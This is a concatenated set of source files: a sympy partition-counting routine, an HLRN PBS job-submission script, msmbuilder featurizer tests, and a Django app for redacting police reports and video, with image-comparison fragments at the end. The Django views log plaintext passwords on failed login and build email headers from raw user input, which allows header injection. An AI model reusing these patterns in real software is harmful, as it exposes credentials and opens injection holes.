significantly speed up subsequent calls to ``count_partitions``,
so it may be advantageous not to clear the object.
Examples
========
>>> from sympy.utilities.enumerative import MultisetPartitionTraverser
>>> m = MultisetPartitionTraverser()
>>> m.count_partitions([9,8,2])
288716
>>> m.count_partitions([2,2])
9
>>> del m
Notes
=====
If one looks at the workings of Knuth's algorithm M [AOCP]_, it
can be viewed as a traversal of a binary tree of parts. A
part has (up to) two children, the left child resulting from
the spread operation, and the right child from the decrement
operation. The ordinary enumeration of multiset partitions is
an in-order traversal of this tree, and with the partitions
corresponding to paths from the root to the leaves. The
mapping from paths to partitions is a little complicated,
since the partition would contain only those parts which are
leaves or the parents of a spread link, not those which are
parents of a decrement link.
For counting purposes, it is sufficient to count leaves, and
this can be done with a recursive in-order traversal. The
number of leaves of a subtree rooted at a particular part is a
function only of that part itself, so memoizing has the
potential to speed up the counting dramatically.
This method follows a computational approach which is similar
to the hypothetical memoized recursive function, but with two
differences:
1) This method is iterative, borrowing its structure from the
other enumerations and maintaining an explicit stack of
parts which are in the process of being counted. (There
may be multisets which can be counted reasonably quickly by
this implementation, but which would overflow the default
Python recursion limit with a recursive implementation.)
2) Instead of using the part data structure directly, a more
compact key is constructed. This saves space, but more
importantly coalesces some parts which would remain
separate with physical keys.
Unlike the enumeration functions, there is currently no _range
version of count_partitions. If someone wants to stretch
their brain, it should be possible to construct one by
memoizing with a histogram of counts rather than a single
count, and combining the histograms.
"""
# number of partitions so far in the enumeration
self.pcount = 0
# dp_stack is list of lists of (part_key, start_count) pairs
self.dp_stack = []
# dp_map is map part_key-> count, where count represents the
# number of multiset which are descendants of a part with this
# key, **or any of its decrements**
# Thus, when we find a part in the map, we add its count
# value to the running total, cut off the enumeration, and
# backtrack
if not hasattr(self, 'dp_map'):
self.dp_map = {}
self._initialize_enumeration(multiplicities)
pkey = part_key(self.top_part())
self.dp_stack.append([(pkey, 0), ])
while True:
while self.spread_part_multiplicity():
pkey = part_key(self.top_part())
if pkey in self.dp_map:
# Already have a cached value for the count of the
# subtree rooted at this part. Add it to the
# running counter, and break out of the spread
# loop. The -1 below is to compensate for the
# leaf that this code path would otherwise find,
# and which gets incremented for below.
self.pcount += (self.dp_map[pkey] - 1)
self.lpart -= 1
break
else:
self.dp_stack.append([(pkey, self.pcount), ])
# M4 count a leaf partition
self.pcount += 1
# M5 (Decrease v)
while not self.decrement_part(self.top_part()):
# M6 (Backtrack)
for key, oldcount in self.dp_stack.pop():
self.dp_map[key] = self.pcount - oldcount
if self.lpart == 0:
return self.pcount
self.lpart -= 1
# At this point have successfully decremented the part on
# the stack and it does not appear in the cache. It needs
# to be added to the list at the top of dp_stack
pkey = part_key(self.top_part())
self.dp_stack[-1].append((pkey, self.pcount),)
def part_key(part):
"""Helper for MultisetPartitionTraverser.count_partitions that
creates a key for ``part``, that only includes information which can
affect the count for that part. (Any irrelevant information just
reduces the effectiveness of dynamic programming.)
Notes
=====
This member function is a candidate for future exploration. There
are likely symmetries that can be exploited to coalesce some
``part_key`` values, and thereby save space and improve
performance.
"""
# The component number is irrelevant for counting partitions, so
# leave it out of the memo key.
rval = []
for ps in part:
rval.append(ps.u)
rval.append(ps.v)
return tuple(rval)
|
wxgeo/geophar
|
wxgeometrie/sympy/utilities/enumerative.py
|
Python
|
gpl-2.0
| 43,440
|
[
"VisIt"
] |
53295876afc43f015b718d2cdf9b1acbb6af3afcdcef43f52fbb2a57f1b7ddc2
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
What it does
============
B{This is the fifth step of ZIBgridfree.}
This tool performs the task of L{zgf_mdrun} on HLRN. In addition to the inherited L{zgf_mdrun} options, you can pick several options for the HLRN job script, such as job queue, time limit, and e-mail notification. It is also possible to allocate a larger number of nodes and subdivide these into separate L{zgf_mdrun} processes. Alternatively, you can call this tool several times on the same node pool to submit multiple smaller jobs. For more information, please refer to the L{zgf_mdrun} documentation.
B{The next step is L{zgf_refine}, if you want to refine or extend nodes where convergence has not been achieved. Otherwise, you can proceed with L{zgf_reweight}.}
How it works
============
At the command line, type::
$ zgf_submit_job_HLRN [options]
"""
import subprocess
import re
import sys
import tempfile
import math
import os
import zgf_mdrun
from ZIBMolPy.pool import Pool
from ZIBMolPy.ui import Option, OptionsList
def load_queues():
try:
p = subprocess.Popen(['qstat','-q'], stdout=subprocess.PIPE)
stdout = p.communicate()[0]
assert(p.returncode == 0)
foo = re.match(".*\nQueue\s[^\n]*\n[- ]*(\n.*)", stdout, re.DOTALL).group(1)
return( re.findall("\n(\w+)\s", foo) )
except:
return([])
options_desc = OptionsList([
Option("C", "commandhlrn", "choice", "parallel PBS executable HLRN3", choices=("aprun","mpiexec","none")),
Option("Q", "queue", "choice", "queue for scheduling", choices=["auto",]+sorted(load_queues())),
Option("N", "nodes", "int", "number of computing cluster nodes", default=2, min_value=1),
Option("P", "ppn", "int", "number of processors per node", default=24, min_value=1),
Option("W", "walltime", "float", "job-walltime in hours", default=1.0, min_value=0.1),
Option("M", "email", "str", "email-address for notifications"),
Option("D", "dryrun", "bool", "Only generates job-file, but does not submit it", default=False),
Option("S", "subdivide", "int", "number of parallel zgf_mdrun processes started within the job", min_value=1, default=1),
Option("A", "account", "str", "account to be debited"),
])
sys.modules[__name__].__doc__ += options_desc.epytext() # for epydoc
# reuse some options from zgf_mdrun
FORWARDED_ZGF_MDRUN_OPTIONS = ("seq", "npme", "reprod", "pd", "convtest", "auto-refines", "multistart")
for x in FORWARDED_ZGF_MDRUN_OPTIONS:
options_desc.append(zgf_mdrun.options_desc[x])
def is_applicable():
pool = Pool()
return(len(pool.where("state in ('em-mdrun-able', 'mdrun-able', 'rerun-able-converged', 'rerun-able-not-converged')")) > 0)
#===============================================================================
def main():
options = options_desc.parse_args(sys.argv)[0]
assert(options.nodes % options.subdivide == 0)
joblines = ["#!/bin/bash"]
joblines += ["#PBS -N zgf_job", "#PBS -j oe",]
if(options.email):
joblines += ["#PBS -m ea -M "+options.email]
if(options.account):
joblines += ["#PBS -A "+options.account]
wt_hours = math.floor(options.walltime)
wt_minutes = (options.walltime - wt_hours) * 60
joblines += ["#PBS -l walltime=%0.2d:%0.2d:00"%(wt_hours, wt_minutes)]
if(options.queue != "auto"):
joblines += ["#PBS -q "+options.queue]
joblines += ["#PBS -l nodes=%d:ppn=%d"%(options.nodes, options.ppn)]
joblines += ["source ${MODULESHOME}/init/sh"]
#for m in ("gromacs/gromacs-4.5.4-single", "zibmolpy"):
for m in os.environ['LOADEDMODULES'].split(":"):
joblines += ["module load "+m]
# on some machines the local module has to be loaded ... depracted on HLRN3
#joblines += ['if ! python -c "import numpy" &>/dev/null; then']
#joblines += [' module load local']
#joblines += ['fi']
joblines += ["set -x"]
joblines += ["hostname --fqdn"]
joblines += ["export"]
joblines += ["date"]
joblines += ["cd $PBS_O_WORKDIR"]
zgfmdrun_call = "zgf_mdrun --np=%d"%(options.nodes*options.ppn / options.subdivide)
zgfmdrun_call += " --pbs=" + options.commandhlrn
# forward options to zgf_mdrun
for o in zgf_mdrun.options_desc:
if(o.long_name in FORWARDED_ZGF_MDRUN_OPTIONS):
zgfmdrun_call += " " + " ".join(o.forward_value(options))
# TODO better: "-option=value" , meaning wrap each item in quotes
# ... the shell should remove them.
for i in range(options.subdivide):
joblines += [zgfmdrun_call + " &> zgf_mdrun.${PBS_JOBID}.%d.log &"%i]
joblines += ["wait"]
joblines += ["date"]
content = "\n".join(joblines)
content += "\n#EOF\n"
print "Generated Jobfile:\n"+content
sys.stdout.flush()
fn = tempfile.mkstemp(prefix='tmp', suffix='.sh')[1]
f = open(fn, "w")
f.write(content)
f.close()
if(not options.dryrun):
subprocess.check_call(["msub", "-v", "MODULEPATH",fn])
os.remove(fn)
#==========================================================================
if(__name__=="__main__"):
main()
#EOF
|
CMD-at-ZIB/ZIBMolPy
|
tools/zgf_submit_job_HLRN.py
|
Python
|
lgpl-3.0
| 4,924
|
[
"Gromacs"
] |
6156ed911ca4cd45f31158780144d2e47a917cfe10835adbc3ae72fdbee58179
|
import warnings
import mdtraj as md
import numpy as np
from msmbuilder.featurizer import LigandContactFeaturizer
from msmbuilder.featurizer import BinaryLigandContactFeaturizer
from msmbuilder.featurizer import LigandRMSDFeaturizer
def _random_trajs():
top = md.Topology()
c = top.add_chain()
r = top.add_residue('HET', c)
r2 = top.add_residue('HET', c)
r3 = top.add_residue('HET', c)
cx = top.add_chain()
rx = top.add_residue('HET', cx)
for _ in range(10):
top.add_atom('CA', md.element.carbon, r)
top.add_atom('CA', md.element.carbon, r2)
top.add_atom('CA', md.element.carbon, r3)
for _ in range(10):
top.add_atom('CA', md.element.carbon, rx)
traj = md.Trajectory(xyz=np.random.uniform(size=(100, 40, 3)),
topology=top,
time=np.arange(100))
ref = md.Trajectory(xyz=np.random.uniform(size=(1, 40, 3)),
topology=top,
time=np.arange(1))
return traj, ref
def _random_natural_trajs():
top = md.Topology()
c = top.add_chain()
r = top.add_residue('HET', c)
r2 = top.add_residue('HET', c)
r3 = top.add_residue('HET', c)
cx = top.add_chain()
rx = top.add_residue('HET', cx)
atypes = {"C": md.element.carbon,
"CA": md.element.carbon,
"N": md.element.nitrogen}
for name, t in atypes.items():
top.add_atom(name, t, r)
top.add_atom(name, t, r2)
top.add_atom(name, t, r3)
top.add_atom('CA', md.element.carbon, rx)
traj = md.Trajectory(xyz=np.random.uniform(size=(100, 10, 3)),
topology=top,
time=np.arange(100))
ref = md.Trajectory(xyz=np.random.uniform(size=(1, 10, 3)),
topology=top,
time=np.arange(1))
return traj, ref
def test_chain_guessing():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
contacts = feat.transform(traj)
assert feat.protein_chain == 0
assert feat.ligand_chain == 1
assert len(contacts) == 100
assert contacts[0].shape[1] == 3
def test_binding_pocket():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
pocket_ref = feat.transform([ref])
limit = (max(pocket_ref[0][0]) + min(pocket_ref[0][0]))/2.0
number_included = sum(pocket_ref[0][0] < limit)
pocket_feat = LigandContactFeaturizer(reference_frame=ref,
binding_pocket=limit)
pocket_contacts = pocket_feat.transform(traj)
assert len(pocket_contacts[0][0]) == number_included
def test_binaries():
traj, ref = _random_trajs()
feat = BinaryLigandContactFeaturizer(reference_frame=ref, cutoff=0.1)
binaries = feat.transform(traj)
assert np.sum(binaries[:]) <= len(binaries)*binaries[0].shape[1]
def test_ca_binaries():
traj, ref = _random_natural_trajs()
feat = BinaryLigandContactFeaturizer(reference_frame=ref,
cutoff=0.1, scheme='ca')
binaries = feat.transform(traj)
assert np.sum(binaries[:]) <= len(binaries)*binaries[0].shape[1]
def test_binaries_binding_pocket():
traj, ref = _random_trajs()
feat = LigandContactFeaturizer(reference_frame=ref)
pocket_ref = feat.transform([ref])
limit = (max(pocket_ref[0][0]) + min(pocket_ref[0][0]))/2.0
cutoff = limit*0.8
number_included = sum(pocket_ref[0][0] < limit)
pocket_feat = BinaryLigandContactFeaturizer(reference_frame=ref,
cutoff=cutoff,
binding_pocket=limit)
pocket_binaries = pocket_feat.transform(traj)
assert len(pocket_binaries[0][0]) == number_included
assert (np.sum(pocket_binaries[:]) <=
len(pocket_binaries)*pocket_binaries[0].shape[1])
def test_single_index_rmsd():
traj, ref = _random_trajs()
feat = LigandRMSDFeaturizer(reference_frame=ref,
calculate_indices=[ref.n_atoms-1])
single_cindex = feat.transform([traj])
assert np.unique(single_cindex).shape[0] > 1
# this actually won't pass for standard mdtraj rmsd
# with len(atom_indices)=1, I think because of the superposition
# built into the calculation
def test_mdtraj_equivalence():
traj, ref = _random_trajs()
feat = LigandRMSDFeaturizer(reference_frame=ref, align_by='custom',
calculate_for='custom', align_indices=range(ref.n_atoms),
calculate_indices=range(ref.n_atoms))
multi_chain = feat.transform([traj])
md_traj = md.rmsd(traj,ref,frame=0)
np.testing.assert_almost_equal(multi_chain[0][:, 0], md_traj, decimal=4)
|
msultan/msmbuilder
|
msmbuilder/tests/test_ligandfeaturizers.py
|
Python
|
lgpl-2.1
| 4,822
|
[
"MDTraj"
] |
7b83d4796b850ec74d1bc894ae41caa07a3ee511f87c1b61c458ff4f288d59b1
|
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
import os
import json
import re
from models import Word, ProcessingLog, RedactionEvent
def get_settings():
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = f.read()
return json.loads(settings)
def home(request):
settings = get_settings()
return render_to_response('home.html', {'system_name': settings['system_name']})
def is_logged_in(request):
return HttpResponse(request.user.is_authenticated())
@login_required
def test_artibury_ffmpeg_options(request):
import os
print os.getcwd()
os.system('rm test_videos/overredacted_*; rm test_videos/frames/*')
videos = [name for name in os.listdir("test_videos") if name.endswith(".mp4")]
color = True if request.GET['color'] == 'true' else False
blurn = int(request.GET['blurn'])
if color:
color = ''
else:
color = 'format=gray,'
for video in videos:
command = 'ffmpeg -threads 0 -i test_videos/%s -crf 20 -preset ultrafast -vf %s"boxblur=%s:%s",format=yuv422p -an test_videos/overredacted_%s' % (video,color,blurn,blurn,video)
fcommand = command
os.system(command)
command = 'ffmpeg -i test_videos/overredacted_%s -vf fps=1/30 test_videos/frames/%s_img\%%04d.jpg' % (video, video)
#os.system(command)
#command = 'ffmpeg -i test_videos/overredacted_%s -vf fps=1/30 test_videos/frames/n%s_img\%%04d.jpg' % (video, video)
os.system(command)
overredacted_frames = ['/test_frames/' + item for item in sorted(os.listdir("test_videos/frames"))]
print color, blurn, fcommand
return HttpResponse(json.dumps(overredacted_frames), content_type="application/json")
@login_required
def detected_regions(request):
return HttpResponse(json.dumps(sorted(os.listdir('media/detected_regions/frames/'))), content_type="application/json")
@login_required
def test_ffmpeg_options(request):
import os
print os.getcwd()
overredacted_frames = ['/test_frames/' + item for item in sorted(os.listdir("test_videos/frames")) if 'color_'+request.GET['color']+'_blurn_'+str(request.GET['blurn'])+'_' in item]
return HttpResponse(json.dumps(overredacted_frames), content_type="application/json")
@login_required
def current_settings(request):
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = f.read()
return HttpResponse(settings, content_type="application/json")
def is_capitalized(word):
if not word:
return False
else:
return word[0].isupper()
@login_required
def change_settings(request):
import time
timestr = time.strftime("%Y%m%d-%H%M%S")
# backup the current settings
os.system('mkdir ../settings_backups; cp ../settings.json ../settings_backups/settings_%s.json' % (timestr))
f = open(os.path.join(os.getcwd(), '../settings.json'))
settings = json.loads(f.read())
f.close()
new_settings = json.loads(request.POST['new_settings'])
settings.update(new_settings)
f = open(os.path.join(os.getcwd(), '../settings.json'), 'w')
settings = f.write(json.dumps(settings))
f.close()
return HttpResponse('done')
@login_required
def test_frames(request, filename):
import magic
mime = magic.Magic(mime=True)
filepath = os.path.join(os.getcwd(), 'test_videos/frames/'+filename)
print 'filepath', filepath
image_data = open(filepath, "rb").read()
return HttpResponse(image_data, content_type=mime.from_file(filepath))
def login(request):
from django.contrib.auth import authenticate, login
# If the request is a HTTP POST, try to pull out the relevant information.
if request.method == 'POST':
# Gather the username and password provided by the user.
# This information is obtained from the login form.
username = request.POST['username']
password = request.POST['password']
# Use Django's machinery to attempt to see if the username/password
# combination is valid - a User object is returned if it is.
user = authenticate(username=username, password=password)
# If we have a User object, the details are correct.
# If None (Python's way of representing the absence of a value), no user
# with matching credentials was found.
if user:
# Is the account active? It could have been disabled.
if user.is_active:
# If the account is valid and active, we can log the user in.
# We'll send the user back to the homepage.
login(request, user)
return HttpResponse('valid')
else:
# An inactive account was used - no logging in!
return HttpResponse("invalid")
else:
# Bad login details were provided. So we can't log the user in.
print "Invalid login details: {0}, {1}".format(username, password)
return HttpResponse("invalid")
@login_required
def logout(request):
from django.contrib.auth import logout
logout(request)
return HttpResponse('Logged out')
def get_random_id():
import random
return ''.join(random.choice('0123456789ABCDEF') for i in range(16))
def extract_narrative(report):
preview = report
lines = preview.split('\n')
if '15 INITIAL INCIDENT DESCRIPTION / NARRATIVE:' in preview:
preview = lines[lines.index('15 INITIAL INCIDENT DESCRIPTION / NARRATIVE:') + 1: lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
elif 'OFFICER NARATIVE' in preview:
preview = lines[lines.index('OFFICER NARATIVE') + 1: lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
else:
preview = lines[1:lines.index('I hereby declare (certify) under penalty of perjury under the laws of the')]
if preview[0].startswith('['):
preview[0] = preview[0][1:]
unneccessaries = ['Page', 'For: ', 'PATROL', 'CLEARANCE', 'NARRATIVE', 'OFFICER NARRATIVE', 'NARRATIVE TEXT HARDCOPY', 'SEATTLE POLICE DEPARTMENT', 'GENERAL OFFENSE HARDCOPY', 'PUBLIC DISCLOSURE RELEASE COPY', 'GO#', 'LAW DEPT BY FOLLOW-UP UNIT', ']']
for unneccessary in unneccessaries:
preview = [line.strip() for line in preview if not line.startswith(unneccessary)]
import re
preview = [line.strip() for line in preview if not re.search('[A-Z0-9]+\-[A-Z0-9]+ [A-Z0-9]+\-[A-Z0-9]+', line)]
preview = [line.strip() for line in preview if not re.search('\d+\-\d+ [A-Z]+ [A-Z\-]+', line)]
preview = [line.strip() for line in preview if not re.search('^[A-Z\-]+$', line.strip())]
preview = [line.strip() for line in preview if not line.startswith('Author:')]
preview = [line.strip() for line in preview if not line.startswith('Related date:')]
preview = '\n'.join(preview)
paragraphs = preview.split('\n\n')
#print 'parahraphs', len(paragraphs)
paragraphs = [paragraph.replace('\n', ' ') for paragraph in paragraphs]
preview = '\n\n'.join(paragraphs)
preview = preview.replace('\n'*5, ' ')
preview = preview.replace('\n'*4, ' ')
preview = preview.replace('\n'*3, ' ')
preview = preview.strip()
preview = preview.replace('Sgt.', 'Sgt')
return preview
def get_redacted_words(narrative):
from models import Word
import re
safe_words = [w.word for w in Word.objects.filter(safe=True)]
redacted_words = []
narrative_words = filter(None, re.split("[ \n]+", narrative))
for word in narrative_words:
if word not in safe_words:
redacted_words.append('<span class="safe">%s</span>' % (word))
redacted_words = sorted(list(set(redacted_words)))
return redacted_words
def remove_punctuation(word):
return word.strip('.?!,":\'\#\(\)\{\}\/;*').replace("'s", '')
def is_recent_date(word): # objective is to ensure birthdays are not released
if not re.search('^\d+[/\-]\d+[/\-]\d+$', remove_punctuation(word)):
return False
try:
from dateutil.parser import parse
import datetime
a = datetime.datetime.now()
b = parse(word)
c = a - b
if c.days < 60:
return True
else:
return False
except:
import sys, traceback
traceback.print_exc(file=sys.stdout)
return False
def is_call_sign(word):
if re.search('^\d+[A-Za-z]+\d+$', word):
return True
elif re.search('^\d\-[A-Za-z]+\-\d+$', word): # 2W11
return True
else:
return False
def is_count(word, next_word):
if re.search('^[\d\.]+$', remove_punctuation(word)) and remove_punctuation(next_word).endswith('s'):
return True
else:
return False
def is_persons_initial(word):
return True if re.search('^[\w]\.$', word) else False
def is_measurement(word):
return re.search('^\d{2}\"$', word)
def is_age(word, next_word):
if re.search('^\d+$', word):
if next_word.startswith('year'):
return True
else:
return False
else:
return False
def is_officer(word, prev_prev_word, prev_word):
abbreviations = ['Officer', 'officer', 'Off.', 'Off','OFC', 'Ofc', 'SGT', 'Sgt', 'LT', 'Lt', 'CPT', 'Cpt', 'Sgt.']
if remove_punctuation(prev_word) in abbreviations or remove_punctuation(prev_prev_word) in abbreviations:
if is_capitalized(word) or re.search('^\#\d+$', remove_punctuation(word)): # Officer #3830
return True
else:
return False
else:
return False
def is_ordinal(word, next_word):
if re.search('^\d+(th|nd|rd)$', remove_punctuation(word.lower())):
return True
elif re.search('^\d+$', word) and remove_punctuation(next_word.lower()) in ['th', 'nd', 'rd']:
return True
else:
return False
def is_street_name(word, prev_word, next_word):
if is_capitalized(word):
t = False
address_initials = ['S', 'S.', 'St.', 'AVE', 'AV', 'Av', 'Alley', 'Al']
if prev_word in address_initials or next_word in address_initials:
return True
else:
return False
elif re.search('^\d+AV$', word):
return True
else:
return False
def is_block(word, next_word):
if re.search('^\d+$', word) and next_word in ['block']:
return True
else:
return False
def is_ssn(word):
if re.search('\d{3}\-\d{2}\-\d{4}', word):
return True
else:
return False
def is_building_number(word, next_word):
if re.search('^\d+$', word) and (is_capitalized(next_word) or re.search('^\dAV$', next_word)):
return True
else:
return False
def is_dollar(word):
if re.search('^\$[\d\.]+$', remove_punctuation(word)):
return True
else:
return False
def mark_sentence_words_for_redaction(sentence, safe_words, unsafe_words):
s = []
narrative_words = sentence.split(' ')
next_word = ''
for i, word in enumerate(narrative_words):
next_word = ''
prev_word = ''
prev_prev_word = ''
try:
next_word = narrative_words[i+1]
except:
pass
try:
prev_word = narrative_words[i-1]
except:
pass
try:
prev_prev_word = narrative_words[i-2]
except:
pass
if is_ssn(remove_punctuation(word)):
s.append('<span class="unsafe" title="social security number">XXX</span>-<span class="unsafe" title="social security number">XX</span>-<span class="unsafe" title="social security number">XXXX</span>')
elif is_persons_initial(word): # person's middle initial
s.append('<span class="unsafe">%s</span>.' % (word[0]))
elif is_count(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_street_name(word, prev_word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_block(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_building_number(word, next_word):
s.append(word[:-2]+'<span class="unsafe">'+word[-2:]+'</span>')
elif is_officer(word, prev_prev_word, prev_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_measurement(word): # measurement
s.append('<span class="safe">%s</span>' % (word))
elif is_age(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif is_ordinal(word, next_word):
s.append('<span class="safe">%s</span>' % (word))
elif re.search('^[A-Z]/[A-Z]$', remove_punctuation(word)):
s.append('<span class="safe">%s</span>' % (word))
elif is_dollar(word):
s.append('<span class="safe">%s</span>' % (word))
elif re.search('^\d{4}$', word) and remove_punctuation(next_word) in ['hours', 'hrs']: # to deal with 1150 hours
s.append('<span class="safe">%s</span>' % (word))
elif re.search("^\w+/[\w']+$", remove_punctuation(word)):
w1, w2 = word.split('/')
if not w1 in safe_words:
w1 = '<span class="unsafe">%s</span>' % (w1)
if not w2 in safe_words:
if w2.endswith("'s"):
w2 = '<span class="unsafe">%s</span>\'s' % (w2[:-2])
else:
#w2 = '<span class="unsafe">%s</span>' % (w2)
w2 = re.sub('[\w\d/\-]+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(w2)), w2)
s.append('%s/%s' % (w1, w2))
elif re.search('^\w+,\w+$', remove_punctuation(word)):
w1, w2 = word.split(',')
if not w1 in safe_words:
w1 = '<span class="unsafe">%s</span>' % (w1)
if not w2 in safe_words:
#w2 = '<span class="unsafe">%s</span>' % (w2)
w2 = re.sub('[\w\d/\-]+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(w2)), w2)
s.append('%s,%s' % (w1, w2))
elif i == 0 or re.search('^"[A-Z]', word): # if quote in front of capitalized word like "Pulled a gun on him."
if remove_punctuation(word) not in safe_words and remove_punctuation(word).lower() not in safe_words or remove_punctuation(word) in unsafe_words:
#s.append('<span class="unsafe" title="unsafe first word of sentence">%s</span>' % (word))
if "'s" in word:
s.append(re.sub('[\w\d/\-\:]+', '<span class="unsafe" title="unsafe first word of sentence">%s</span>\'s' % (remove_punctuation(word)), word.replace("'s", '')))
else:
s.append(re.sub('[\w\d\-]+', '<span class="unsafe" title="unsafe first word of sentence">%s</span>' % (remove_punctuation(word)), word))
else:
s.append('<span title="first word of sentence">%s</span>' % (word))
elif re.search('^\d{2}\:\d{2}$', remove_punctuation(word)):
s.append('<span title="time">%s</span>' % (word))
elif is_recent_date(word):
s.append('<span title="is recent date">%s</span>' % (word))
elif is_call_sign(remove_punctuation(word)):
s.append('<span title="call sign">%s</span>' % (word))
else:
if remove_punctuation(word) not in safe_words and not '-' in word:
if "'s" in word:
s.append(re.sub('[\w\d/\-\:]+', '<span class="unsafe" title="not in dictionary">%s</span>\'s' % (remove_punctuation(word)), word.replace("'s", '')))
else:
s.append(re.sub('[\w\d/\-\']+', '<span class="unsafe" title="not in dictionary">%s</span>' % (remove_punctuation(word)), word))
elif '-' in word: # deal with words like anti-harassment order
safe = True
for w in word.split('-'):
if not remove_punctuation(w) in safe_words:
safe = False
if safe:
s.append('<span class="safe">%s</span>' % (word))
else:
s.append(re.sub('[\w\d/\-]+', '<span class="unsafe" title="word with dash">%s</span>' % (remove_punctuation(word)), word))
else:
s.append('<span class="safe">%s</span>' % (word))
return ' '.join(s)
def mark_words_for_redaction(narrative, safe_words, unsafe_words):
print 'start'
if re.search('^[A-Z\d\s,\-\.]+$', narrative):
return '<span title="every letter is capitalized">%s</span>' % (narrative)
import nltk.data
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
safe_words = [w.word for w in Word.objects.filter(safe=True)]
s = []
narrative_words = filter(None, re.split("[ \n]+", narrative))
sentences = tokenizer.tokenize(narrative)
print 'done'
return ' '.join([mark_sentence_words_for_redaction(sentence, safe_words, unsafe_words) for sentence in sentences])
@login_required
def mark_word(request, the_type):
safe = True if the_type == 'safe' else False
is_modify = True if request.POST.get('modify') == 'true' else False
if is_modify:
try:
word = Word(word=request.POST['word'], safe=safe)
word.save()
except:
word = Word.objects.get(word=request.POST['word'])
word.safe = True
word.save()
redaction_event = RedactionEvent(report_filename=request.POST['report_filename'], user=request.user, word=request.POST['word'], is_marked=not safe, is_wordlist_modified=is_modify)
redaction_event.save()
return HttpResponse('')
@login_required
def overredact_reports(request):
os.system('mkdir ../reports/')
random_id = get_random_id()
with open('../reports/history.txt', 'a') as historyfile:
historyfile.write('\n'+request.FILES['file'].name+'\n')
f = open('../reports/%s.pdf' % (random_id), 'w')
f.write(request.FILES['file'].read())
f.close()
os.system('pdf2txt.py ../reports/%s.pdf > ../reports/%s.txt' % (random_id, random_id))
#os.system('rm ../reports/%s.pdf' % (random_id))
f = open('../reports/%s.txt' % (random_id))
#os.system('rm ../reports/%s.txt' % (random_id))
preview = f.read()
preview = extract_narrative(preview).strip(']')
redacted_words = get_redacted_words(preview)
paragraphs = preview.split('\n\n')
processed_paragraphs = []
print '# of paragraphs: %s' % (len(paragraphs))
safe_words = [w.word for w in Word.objects.filter(safe=True)]
unsafe_words = [w.word for w in Word.objects.filter(safe=False)]
processed_paragraphs = [mark_words_for_redaction(paragraph, safe_words, unsafe_words) for paragraph in paragraphs]
preview = '\n\n'.join(processed_paragraphs)
processing_log = ProcessingLog(report_filename=request.FILES['file'].name, user=request.user)
processing_log.save()
processing_id = processing_log.id
return HttpResponse(json.dumps({'processing_id': processing_id, 'report_filename': request.FILES['file'].name, 'message': 'File uploaded successfully!', 'preview': preview.replace('\n', '<br/>')}), content_type="application/json")
@login_required
def minimally_redact_video(request):
os.system('rm -rf ../video_for_minimal_redaction/; mkdir ../video_for_minimal_redaction/')
os.system('aws s3 rm s3://spdvideodetectedregions/ --recursive')
os.system('aws s3 rm s3://spdvideoframesin/ --recursive')
random_id = get_random_id()
os.system('mkdir ../video_for_minimal_redaction/%s/' % (random_id))
# save the video
f = open('../video_for_minimal_redaction/%s.mp4' % (random_id), 'w')
f.write(request.FILES['file'].read())
f.close()
# convert the video to frames
os.system('ffmpeg -threads 0 -i ../video_for_minimal_redaction/%s.mp4 -f image2 ../video_for_minimal_redaction/%s/%%05d.png' % (random_id, random_id))
# save to S3
os.system('aws s3 cp ../video_for_minimal_redaction/%s/ s3://spdvideoframesin/%s/ --recursive' % (random_id, random_id))
# give lambda 20 seconds to process all the frames and then copy the detections to local filesystem
import time
time.sleep(20)
os.system('rm media/detected_regions/frames/*')
os.system('cd media/detected_regions/frames/; aws s3 cp s3://spdvideodetectedregions/%s/ . --recursive' % (random_id))
os.system('aws s3 rm s3://spdvideodetectedregions/ --recursive')
os.system('aws s3 rm s3://spdvideoframesin/ --recursive')
return HttpResponse(str(random_id))
@login_required
def email_report(request):
try:
processing_log = ProcessingLog(id=request.POST['processing_id'])
from datetime import datetime
processing_log.stop_time = datetime.now()
processing_log.save()
except:
pass
settings = get_settings()
import smtplib
recipient = request.POST['to']
session = smtplib.SMTP('smtp.gmail.com', 587)
session.ehlo()
session.starttls()
session.login(settings["email_username"], settings["email_password"])
email_subject = "Police report narrative you requested"
body_of_email = request.POST['body']
headers = "\r\n".join(["from: Seattle Police <spdnews@seattle.gov>",
"subject: " + email_subject,
"to: " + request.POST['to'],
"X-Bcc: policevideorequests@gmail.com",
"mime-version: 1.0",
"content-type: text/html"])
# body_of_email can be plaintext or html!
content = headers + "\r\n\r\n" + body_of_email
session.sendmail("timacbackup", request.POST['to'], content)
session.quit()
return HttpResponse('done')
# USAGE
# python compare.py
# import the necessary packages
from skimage.measure import structural_similarity as ssim
import matplotlib.pyplot as plt
import numpy as np
import cv2
def mse(imageA, imageB):
# the 'Mean Squared Error' between the two images is the
# sum of the squared difference between the two images;
# NOTE: the two images must have the same dimension
err = np.sum((imageA.astype("float") - imageB.astype("float")) ** 2)
err /= float(imageA.shape[0] * imageA.shape[1])
# return the MSE, the lower the error, the more "similar"
# the two images are
return err
#!/usr/bin/env python
"""Compare two aligned images of the same size.
Usage: python compare.py first-image second-image
"""
import sys
from scipy.misc import imread
from scipy.linalg import norm
from scipy import sum, average
def main():
file1, file2 = sys.argv[1:1+2]
# read images as 2D arrays (convert to grayscale for simplicity)
img1 = to_grayscale(imread(file1).astype(float))
img2 = to_grayscale(imread(file2).astype(float))
# compare
n_m, n_0 = compare_images(img1, img2)
print "Manhattan norm:", n_m, "/ per pixel:", n_m/img1.size
print "Zero norm:", n_0, "/ per pixel:", n_0*1.0/img1.size
def compare_images(img1, img2):
# normalize to compensate for exposure difference
img1 = normalize(img1)
img2 = normalize(img2)
# calculate the difference and its norms
diff = img1 - img2 # elementwise for scipy arrays
